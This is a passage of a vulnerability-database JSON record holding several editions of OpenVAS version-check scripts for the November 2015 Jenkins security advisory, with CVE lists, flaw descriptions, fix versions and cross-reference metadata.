value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An Improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif (!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = 
infos[\"proto\"];\n\nif(version_is_less(version:version, test_version:\"1.625.2\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"1.625.2\", install_path: location);\n security_message(data:report, port:port, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "title": "CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 4}, "differentElements": ["references", "modified", "sourceData", "title"], "edition": 11, "lastseen": "2019-07-30T14:17:44"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 8, "enchantments": {"dependencies": {"modified": "2018-12-12T13:45:31", "references": [{"idList": ["1337DAY-ID-24727"], "type": "zdt"}, {"idList": ["JENKINS_CLI_DESERIALIZATION"], "type": "canvas"}, {"idList": ["REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-D7E5461DBF.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"], "type": "nessus"}, {"idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"], "type": "pentestit"}, {"idList": ["ASA-201511-11"], "type": "archlinux"}, {"idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310807001"], "type": "openvas"}, {"idList": ["PACKETSTORM:134805"], "type": "packetstorm"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE"], "type": "metasploit"}, {"idList": ["EDB-ID:38983"], "type": 
"exploitdb"}, {"idList": ["CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5318", "CVE-2015-5325", "CVE-2015-8103"], "type": "cve"}, {"idList": ["KITPLOIT:5230099254245458698"], "type": "kitploit"}, {"idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"], "type": "impervablog"}, {"idList": ["RHSA-2016:0070", "RHSA-2016:22381", "RHSA-2016:0489"], "type": "redhat"}, {"idList": ["VU:576313"], "type": "cert"}]}, "score": {"value": 6.8, "vector": "NONE"}}, "hash": "42188471322df3db0c3e8ef49be9cfb04aec65fe5a733c4c4ac068cc604794b6", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "53e4d762d061bcb68752f7013bb7c89d", "key": "sourceData"}, {"hash": "aaee812fcbefb91dec01613784b87fbd", "key": "references"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "863c7f66728b14e4d5ca4611abfef795", "key": "modified"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2018-12-12T13:45:31", "modified": "2018-12-11T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11", "https://www.cloudbees.com"], 
"reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cloudbees_jenkins_mult_vuln_aug16_lin.nasl 12761 2018-12-11 14:32:20Z cfischer $\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"$Revision: 12761 $\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-11 15:32:20 +0100 (Tue, 11 Dec 2018) $\");\n 
script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An Improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n 
script_dependencies(\"sw_jenkins_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n script_xref(name:\"URL\", value:\"https://www.cloudbees.com\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!jenkinPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!jenkinVer = get_app_version(cpe:CPE, port:jenkinPort)){\n exit(0);\n}\n\nif(version_is_less(version:jenkinVer, test_version:\"1.625.2\")){\n report = report_fixed_ver(installed_version:jenkinVer, fixed_version:\"1.625.2\");\n security_message(data:report, port:jenkinPort);\n exit(0);\n}\n\nexit(99);", "title": "CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 3}, "differentElements": ["cvss"], "edition": 8, "lastseen": "2018-12-12T13:45:31"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 3, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "9f367e3ae8c8b96db2d5f710cb5d7b6b420ca9b9f1b588a65557fca9ffe0d549", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "813566690a1ba159d228c15d6ac6bbd0", "key": "modified"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "ca6c048be0805c2614771cc6deabc9bb", "key": "sourceData"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": 
"47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "84ac25ec4d8bb0a7c2e92f90d42d6e57", "key": "references"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2018-04-05T15:32:00", "modified": "2018-04-04T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cloudbees_jenkins_mult_vuln_aug16_lin.nasl 9300 2018-04-04 11:55:01Z cfischer $\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cloudbees:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"$Revision: 9300 $\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-04 13:55:01 +0200 (Wed, 04 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help of\n detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - 
The directory traversal vulnerability in while requesting jnlpJars.\n\n - An Improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or\n later. For more updates refer to https://www.cloudbees.com\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name : \"URL\" , value : \"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_jenkins_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/installed\",\"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!jenkinPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!jenkinVer = get_app_version(cpe:CPE, port:jenkinPort)){\n exit(0);\n}\n\nif(version_is_less(version:jenkinVer, test_version:\"1.625.2\")){\n report = report_fixed_ver(installed_version:jenkinVer, fixed_version:\"1.625.2\");\n security_message(data:report, port:jenkinPort);\n exit(0);\n}\n\nexit(99);", "title": "CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, 
"lastseen": "2018-04-05T15:32:00"}], "edition": 13, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "80701cd55b5ac06d1d43d62fdc11c554"}, {"key": "cvss", "hash": "ed80408f65b06df34ed6dfdb743af507"}, {"key": "description", "hash": "8462a0f42042025f88b60ac6cc43fb35"}, {"key": "href", "hash": "fb77f3a2d7d21df49ec9de4b6f393ef2"}, {"key": "modified", "hash": "c6e9fb4c613a1a95ccd907c48b7a7a9e"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "97be7ad8dd311237bb296ca09a9add56"}, {"key": "published", "hash": "a97d31368d124ea1d4cd3a47fe743758"}, {"key": "references", "hash": "51576b010aab228499057cea5ee65aa4"}, {"key": "reporter", "hash": "ea106ff9c2727a6e906e8959871e7c06"}, {"key": "sourceData", "hash": "de828c7c68ab46a7a4b2030b61505146"}, {"key": "title", "hash": "8a5cab442641284f7b36ba08b47f4829"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "3a88d9697b683f7a1284e72ac72c3a299b91d739a501b8d265896312b59bcea3", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310807001", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310131309"]}, {"type": "archlinux", "idList": ["ASA-201511-11"]}, {"type": "nessus", "idList": ["FEDORA_2015-D02FEEBD15.NASL", "REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-89468612F5.NASL", "FREEBSD_PKG_23AF04259EAC11E5B93700E0814CAB4E.NASL", "FEDORA_2015-938C70C840.NASL", "FEDORA_2015-D7E5461DBF.NASL", "FEDORA_2015-A433D8BA72.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"]}, {"type": "redhat", "idList": ["RHSA-2016:22381", "RHSA-2016:0489", "RHSA-2016:0070"]}, {"type": "cve", "idList": ["CVE-2015-7539", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5323", "CVE-2015-7536", "CVE-2015-7537", "CVE-2015-5325", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5326"]}, {"type": "packetstorm", 
"idList": ["PACKETSTORM:134805"]}, {"type": "canvas", "idList": ["JENKINS_CLI_DESERIALIZATION"]}, {"type": "zdt", "idList": ["1337DAY-ID-24727"]}, {"type": "exploitdb", "idList": ["EDB-ID:38983"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND"]}, {"type": "kitploit", "idList": ["KITPLOIT:5230099254245458698"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "cert", "idList": ["VU:576313"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}], "modified": "2019-10-18T15:24:34"}, "score": {"value": 7.3, "vector": "NONE", "modified": "2019-10-18T15:24:34"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins Multiple Vulnerabilities - Nov15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n\n script_name(\"Jenkins Multiple Vulnerabilities - Nov15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting 
jnlpJars.\n\n - An improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(get_kb_item(\"jenkins/\" + port + \"/is_lts\")) {\n 
if(version_is_less(version:version, test_version:\"1.625.2\")) {\n vuln = TRUE;\n fix = \"1.625.2\";\n }\n} else {\n if(version_is_less(version:version, test_version:\"1.638\")) {\n vuln = TRUE;\n fix = \"1.638\";\n }\n}\n\nif(vuln) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, data:report, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "pluginID": "1361412562310808269", "scheme": null}
{"openvas": [{"lastseen": "2019-10-18T15:27:19", "bulletinFamily": "scanner", "description": "The host is installed with Jenkins and is\n prone to multiple vulnerabilities.\n\n This VT has been replaced by VTs 'Jenkins Multiple Vulnerabilities - Nov15 (Linux)'\n (OID: 1.3.6.1.4.1.25623.1.0.808269) and 'Jenkins Multiple Vulnerabilities - Nov15 (Windows)'\n (OID: 1.3.6.1.4.1.25623.1.0.807001).", "modified": "2019-10-17T00:00:00", "published": "2015-11-17T00:00:00", "id": "OPENVAS:1361412562310806621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806621", "title": "Jenkins CLI Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CLI Multiple Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806621\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\", \"CVE-2015-5324\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5325\",\n \"CVE-2015-5326\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-17 12:48:36 +0530 (Tue, 17 Nov 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Jenkins CLI Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Jenkins and is\n prone to multiple vulnerabilities.\n\n This VT has been replaced by VTs 'Jenkins Multiple Vulnerabilities - Nov15 (Linux)'\n (OID: 1.3.6.1.4.1.25623.1.0.808269) and 'Jenkins Multiple Vulnerabilities - Nov15 (Windows)'\n (OID: 1.3.6.1.4.1.25623.1.0.807001).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist as,\n\n - Jenkins UI allows users to see the names of jobs and builds otherwise\n inaccessible to them on the 'Fingerprints' pages.\n\n - The salt used to generate the CSRF protection tokens is a publicly accessible\n value.\n\n - When creating a job using the create-job CLI command, external entities are\n not discarded (nor 
processed).\n\n - JNLP slave connections did not verify that the correct secret was supplied.\n\n - The /queue/api URL could return information about items not accessible to\n the current user.\n\n - The CLI command overview and help pages in Jenkins were accessible without\n Overall/Read permission.\n\n - Access to the /jnlpJars/ URL was not limited to the specific JAR files users\n needed to access, allowing browsing directories and downloading other files in\n the Jenkins servlet resources.\n\n - API tokens of other users were exposed to admins by default.\n\n - Slaves connecting via JNLP were not subject to the optional slave-to-master\n access control.\n\n - Users with the permission to take slave nodes offline can enter arbitrary\n HTML.\n\n - An error due to unsafe deserialization.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information, conduct XXE, XSS and CSRF\n attacks, and execute arbitrary code 